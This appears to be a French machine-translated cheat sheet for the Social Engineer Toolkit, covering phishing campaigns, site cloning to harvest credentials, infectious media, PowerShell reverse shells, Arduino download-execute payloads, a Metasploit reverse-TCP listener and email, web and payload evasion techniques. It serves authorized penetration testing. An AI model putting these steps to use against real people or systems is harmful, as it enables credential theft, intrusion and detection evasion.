Aller au contenu

Boîte à outils de l'ingénieur social (SET)

Copier toutes les commandes SET Générer le guide PDF SET

Le Social Engineer Toolkit (SET) est un cadre de test de pénétration ouvert conçu pour les attaques d'ingénierie sociale. Développé par David Kennedy (ReL1K) et l'équipe TrustedSec, SET automatise un certain nombre d'attaques de génie social et fournit une plate-forme complète pour tester les vulnérabilités humaines dans les évaluations de sécurité.

Installation et configuration

Installation sur Kali Linux

# SET comes pre-installed on Kali Linux
setoolkit

# Update SET
cd /opt/set
git pull

Installation manuelle

# Clone repository
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
cd set/

# Install dependencies
pip3 install -r requirements.txt

# Run setup
python setup.py install

# Launch SET
python setoolkit
```_

### Configuration

```bash
# Edit configuration file
nano /etc/setoolkit/set.config

# Key configuration options:
# WEBATTACK_EMAIL=ON
# APACHE_SERVER=ON
# METASPLOIT_PATH=/usr/share/metasploit-framework
# SENDMAIL=ON
# EMAIL_PROVIDER=GMAIL
```_

## Options du menu principal

### 1) L'ingénierie sociale Attaques

```bash
# Launch SET
setoolkit

# Select option 1 from main menu
# Social-Engineering Attacks submenu:
# 1) Spear-Phishing Attack Vectors
# 2) Website Attack Vectors
# 3) Infectious Media Generator
# 4) Create a Payload and Listener
# 5) Mass Mailer Attack
# 6) Arduino-Based Attack Vector
# 7) Wireless Access Point Attack Vector
# 8) QRCode Generator Attack Vector
# 9) Powershell Attack Vectors
# 10) Third Party Modules

Vecteurs d'attaque à la lance

# Option 1 from Social-Engineering Attacks
# Spear-Phishing submenu:
# 1) Perform a Mass Email Attack
# 2) Create a FileFormat Payload
# 3) Create a Social-Engineering Template

# Mass Email Attack
# - Configure SMTP settings
# - Import email list
# - Create or select email template
# - Attach malicious payload

# FileFormat Payload
# - Select file format (PDF, DOC, XLS, etc.)
# - Choose exploit
# - Generate malicious file

# Email Templates
# - Pre-built templates for common scenarios
# - Custom template creation
# - HTML email support

Vecteurs d'attaque du site Web

# Option 2 from Social-Engineering Attacks
# Website Attack submenu:
# 1) Java Applet Attack Method
# 2) Metasploit Browser Exploit Method
# 3) Credential Harvester Attack Method
# 4) Tabnabbing Attack Method
# 5) Web Jacking Attack Method
# 6) Multi-Attack Web Method
# 7) HTA Attack Method

# Credential Harvester
# - Clone legitimate websites
# - Capture credentials
# - Redirect after capture
# - Email harvested credentials

# Java Applet Attack
# - Self-signed Java applet
# - Social engineering prompt
# - Payload execution after acceptance

# Browser Exploit Method
# - Metasploit browser exploits
# - Automatic exploitation
# - Multiple exploit attempts

Scénarios d'attaque

Récolte crédible

# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 3) Credential Harvester Attack Method

# Harvester options:
# 1) Web Templates
# 2) Site Cloner
# 3) Custom Import

# Site Cloner example:
# Enter URL to clone: https://gmail.com
# SET will clone the site and host locally
# Captured credentials saved to /root/.set/reports/

Campagne d'hameçonnage par courriel

# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 1) Spear-Phishing Attack Vectors
# Select: 1) Perform a Mass Email Attack

# Configuration steps:
# 1) Select attack vector (fileformat, etc.)
# 2) Configure payload
# 3) Setup email template
# 4) Configure SMTP settings
# 5) Import target email list
# 6) Send campaign

# Email list format (emails.txt):
# user1@company.com
# user2@company.com
# user3@company.com

Générateur de médias infectieux

# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 3) Infectious Media Generator

# Media options:
# 1) File-Format Exploits
# 2) Standard Metasploit Executable

# File-Format Exploits:
# - PDF exploits
# - Microsoft Office exploits
# - Browser-based exploits

# Standard Executable:
# - Windows executable
# - Linux executable
# - Mac OSX executable

Vecteurs d'attaque PowerShell

# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 9) Powershell Attack Vectors

# PowerShell options:
# 1) PowerShell Alphanumeric Shellcode Injector
# 2) PowerShell Reverse Shell
# 3) PowerShell Bind Shell
# 4) PowerShell Dump SAM Database

# Reverse Shell example:
# Enter IP address for reverse connection
# Enter port for reverse connection
# Generate PowerShell command
# Execute on target system

Techniques avancées

Charges utiles personnalisées

# Create custom payload
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 4) Create a Payload and Listener

# Payload options:
# 1) Windows Shell Reverse_TCP
# 2) Windows Meterpreter Reverse_TCP
# 3) Windows Meterpreter Reverse_HTTP
# 4) Windows Meterpreter Reverse_HTTPS
# 5) Linux Shell Reverse_TCP

# Configuration:
# Set LHOST (attacker IP)
# Set LPORT (listening port)
# Generate payload
# Setup listener

Méthode Web multi-Attack

# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 6) Multi-Attack Web Method

# Combines multiple attack vectors:
# - Java Applet Attack
# - Metasploit Browser Exploit
# - Credential Harvester
# - Tabnabbing
# - Web Jacking

# Increases success probability
# Automatic fallback methods
# Comprehensive attack coverage

Attaques à base d'arduino

# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 6) Arduino-Based Attack Vector

# Arduino attack types:
# 1) Powershell HTTP GET MSF Payload
# 2) WSCRIPT HTTP GET MSF Payload
# 3) Powershell HTTP POST MSF Payload
# 4) WSCRIPT HTTP POST MSF Payload
# 5) Download-Execute Powershell Attack
# 6) Download-Execute WSCRIPT Attack

# Generates Arduino sketch
# Physical access required
# Automated payload execution
# Bypasses software restrictions

Intégration avec Metasploit

Configuration de l'intégration des métadonnées

# Configure Metasploit path in SET
nano /etc/setoolkit/set.config

# Set Metasploit path:
METASPLOIT_PATH=/usr/share/metasploit-framework

# Start Metasploit listener
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST attacker_ip
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j

Configuration automatisée de l'auditeur

# SET can automatically setup Metasploit listeners
# When creating payloads, select:
# "Do you want to start the listener now? [y/n]:"
# Select 'y' for automatic listener setup

# SET will:
# 1) Generate appropriate payload
# 2) Start msfconsole
# 3) Configure handler
# 4) Start listener

Rapports et exploitation forestière

Rapports justificatifs

# Harvested credentials location
/root/.set/reports/

# View captured credentials
cat /root/.set/reports/2024-01-01\ 12:00:00.txt

# Email reports (if configured)
# Automatic email notifications
# Real-time credential capture alerts

Registres d'attaque

# SET log files
/root/.set/logs/

# View attack logs
tail -f /root/.set/logs/set_logfile.log

# Apache access logs (for web attacks)
tail -f /var/log/apache2/access.log

# Email logs
tail -f /var/log/mail.log

Rapports personnalisés

# Generate custom reports
# Parse log files for specific information
grep "credential" /root/.set/logs/set_logfile.log

# Extract IP addresses
grep -oE "\b([0-9]\\\\{1,3\\\\}\.)\\\\{3\\\\}[0-9]\\\\{1,3\\\\}\b" /root/.set/logs/set_logfile.log

# Count successful attacks
grep -c "successful" /root/.set/logs/set_logfile.log

Techniques d'évacuation

Évasion par courriel

# Domain reputation management
# Use legitimate email providers
# Gradual sending patterns
# Personalized content

# Email headers manipulation
# SPF/DKIM configuration
# Reply-to address spoofing
# Message threading

# Content evasion
# Image-based content
# URL shorteners
# Legitimate file hosting

Évasion d'attaque Web

# Domain fronting
# CDN utilization
# SSL/TLS encryption
# Legitimate hosting providers

# User-Agent rotation
# IP address rotation
# Traffic timing variation
# Legitimate referrer headers

# Content delivery
# Staged payloads
# Encrypted communications
# Legitimate file formats

Évasion de la charge utile

# Encoding techniques
# Encryption methods
# Packing/compression
# Code obfuscation

# Delivery methods
# Legitimate file formats
# Trusted applications
# Signed executables

# Execution techniques
# Living off the land
# PowerShell alternatives
# Memory-only execution

Meilleures pratiques

Considérations juridiques et éthiques

# Always obtain proper authorization
# Document scope and limitations
# Follow responsible disclosure
# Maintain confidentiality

# Create engagement documentation
echo "Social Engineering Test Authorization" > authorization.txt
echo "Client: Company Name" >> authorization.txt
echo "Scope: Email addresses, domains" >> authorization.txt
echo "Date: $(date)" >> authorization.txt
echo "Tester: Your Name" >> authorization.txt

Sécurité opérationnelle

# Use dedicated infrastructure
# Implement proper logging
# Secure communication channels
# Regular backup procedures

# Infrastructure isolation
# Separate testing networks
# Dedicated email accounts
# Isolated web servers

# Data protection
# Encrypted storage
# Secure transmission
# Proper disposal

Méthode d'essai

# Reconnaissance phase
# Target identification
# Information gathering
# Attack vector selection

# Execution phase
# Payload delivery
# Credential harvesting
# System compromise

# Post-exploitation
# Persistence establishment
# Data collection
# Evidence gathering

# Reporting phase
# Impact assessment
# Remediation recommendations
# Executive summary

Dépannage

Questions communes

# Email delivery problems
# Check SMTP configuration
# Verify DNS settings
# Test email connectivity

# Web server issues
# Check Apache configuration
# Verify port availability
# Test web connectivity

# Payload generation errors
# Verify Metasploit integration
# Check dependencies
# Update SET framework

# Permission issues
# Run as root user
# Check file permissions
# Verify directory access

Corrections de configuration

# Reset SET configuration
rm /etc/setoolkit/set.config
setoolkit  # Will recreate config

# Update SET framework
cd /opt/set
git pull
python setup.py install

# Fix Apache issues
sudo systemctl restart apache2
sudo systemctl enable apache2

# Fix email issues
sudo systemctl restart postfix
sudo systemctl enable postfix

Ressources

  • [SET Documents officiels] (LINK_5)
  • Blogue TrutedSec
  • [Cadre de génie social] (LINK_5)
  • [Cadre de cybersécurité NIST] (LINK_5)
  • [SANS Génie social] (LINK_5)